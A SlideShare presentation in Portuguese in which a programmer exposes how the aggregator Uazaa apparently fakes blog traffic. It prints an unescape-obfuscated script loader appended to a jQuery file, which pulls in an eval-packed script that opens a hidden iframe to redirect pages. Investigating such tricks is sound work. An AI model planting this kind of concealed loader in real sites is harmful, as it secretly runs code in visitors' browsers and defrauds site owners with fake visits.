uma farsa...Descobri o método para gerar acessos falsos do sistema de agregadores uazaa....Recentemente houve muita briga ...
Abrindo o arquivo jquery-1.6.2 temos o código....Agora olhem no final do arquivo….temos o seguinte trecho de código....doc...
Depois de decodificado, temos…<script src=3759Hyhjio72wKlMnVdf.js type=text/javascript></script>Vamos acessar o arquivo… 3...
Agora a BOMBA! Achamos o IFRAME do site!!!!Toda vez que uma página onde se encontra um widget é aberto em algum blog parce...
Existe tbm um outro redirecionamento http://www.uazaa.com.br/red.php que pelo que analisei, o dono do uazza podeutilizar p...
Próximos SlideShares
Carregando em…5
×

Uazaa uma farsa

3.019 visualizações

Publicada em

Método que o Agregador Uazaa utiliza para gerar visitas falsas

Publicada em: Aperfeiçoamento pessoal
0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
3.019
No SlideShare
0
A partir de incorporações
0
Número de incorporações
574
Ações
Compartilhamentos
0
Downloads
10
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Uazaa uma farsa

  1. 1. uma farsa...Descobri o método para gerar acessos falsos do sistema de agregadores uazaa....Recentemente houve muita briga no twitter em relação às visitas que este agregador gera para os blogs.Nessa briga, o dono do uazza desafiou a todos para que seja encontrada alguma prova contra ele... como programadorresolvi dar uma olhada no código dele.Normalmente olhamos o código em busca de utilização de iframe. O que não era o caso do uazaa.O uazza utiliza de uma técnica bem engenhosa que coloca um código Javascript criptografado com uma função nativachamada unescape. Além disso, ele o coloca no final de um arquivo .js que não geraria nenhuma suspeita, o Jquery.jsque hoje em dia está presente em qualquer blog....Vamos lá...O trambique está nos arquivos widgets que o uazaa pede para que TODOS os parceiros coloquem no site...Peguei como exemplo o 300x300.php (www.uazaa.xpg.com.br/widgets/300x300.php)Verificando o código fonte, temos:
  2. 2. Abrindo o arquivo jquery-1.6.2 temos o código....Agora olhem no final do arquivo….temos o seguinte trecho de código....document.write(unescape("%3Cscript src=3759Hyhjio72wKlMnVdf.jstype=text/javascript%3E%3C/script%3E"));Ele está criptografado com unescape… então vamos decodificar usando uma ferramentaonline...http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html
  3. 3. Depois de decodificado, temos…<script src=3759Hyhjio72wKlMnVdf.js type=text/javascript></script>Vamos acessar o arquivo… 3759Hyhjio72wKlMnVdf.js (www.uazaa.xpg.com.br/widgets/3759Hyhjio72wKlMnVdf.js)Neste arquivo ele usa o Eval, então agora usamos uma outra ferramenta online…http://www.strictly-software.com/unpacker
  4. 4. Agora a BOMBA! Achamos o IFRAME do site!!!!Toda vez que uma página onde se encontra um widget é aberto em algum blog parceiro, é gerado acesso ao siteprincipal do uazaa... pelo http://www.uazaa.com.br/redirSingle.php
  5. 5. Existe tbm um outro redirecionamento http://www.uazaa.com.br/red.php que pelo que analisei, o dono do uazza podeutilizar para gerar acesso a algum blog parceiro…..Por isso ele consegue um número de acessos tão grande e consegue mandar visitas falas para os blogueiros.É isso pessoal.... Espero que o dono apresente agora explicações...Ah... existem gravações caso ele apague e fale que foi montagem...18/12/2011@devninjaBR

×